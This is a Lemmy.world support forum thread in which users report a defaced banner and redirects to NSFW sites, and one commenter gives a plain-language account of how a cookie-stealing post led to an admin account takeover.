When logging into lemmy.world the banner now says “Israel - ni**a style” (full word unredacted) and it starts linking to lemon party and a bunch of other NSFW sites.

You are viewing a single thread.
View all comments
0 points

Good job on the cleanup.

I’m not seeing any issues anymore, at least from my end.

permalink
report
reply
0 points

Just got another redirect, it’s definitely still happening.

permalink
report
parent
reply
1 point
*

Based on the Github / Rudd’s new post, it looks like there was an “Evil Post” that contained a Markdown-to-Javascript escape and actually allowed the hacker to run Javascript in our web-browsers. Something to do with custom emojis?

So the problem was multi-fold.

  1. The hacker created the “Evil Post”, which constantly was stealing people’s cookies. Anyone who viewed the evil post in a web browser (Chrome/Firefox/Edge) allowed the hacker to have access to their account (and anything you can do in the web browsers).

  2. The hacker waited until an admin viewed the post. Then took control of the administrator’s account, and likely a few other people’s accounts as well. DMs containing the evil-Javascript post were sent to various moderators.

  3. Hacker used the account access to just troll us.


Fixing #3 doesn’t fix #2 or #1. So eventually, when #3 was fixed, the hacker just grabbed the admin-account and made everything back to the way it was.

The problem wouldn’t be fixed permanently until #3, #2, and #1 were all fixed. Which they seem to be fixed now. But this “evil post” is going around the Federation. Other Lemmy-instances may have the post cached, and the users on those lemmies will likely have their JWT cookie also stolen (allowing the hacker to take over people’s accounts those instances in a similar manner)

permalink
report
parent
reply

Lemmy.world Support

!support@lemmy.world

Create post

Lemmy.world Support

Welcome to the official Lemmy.world Support community! Post your issues or questions about Lemmy.world here.

This community is for issues related to the Lemmy World instance only. For Lemmy software requests or bug reports, please go to the Lemmy github page.

This community is subject to the rules defined here for lemmy.world.

To open a support ticket


You can also DM https://lemmy.world/u/lwreport or email report@lemmy.world (PGP Supported) if you need to reach our directly to the admin team.


Follow us for server news 🐘

Outages 🔥

https://status.lemmy.world



Community stats

  • 174

    Monthly active users

  • 822

    Posts

  • 6K

    Comments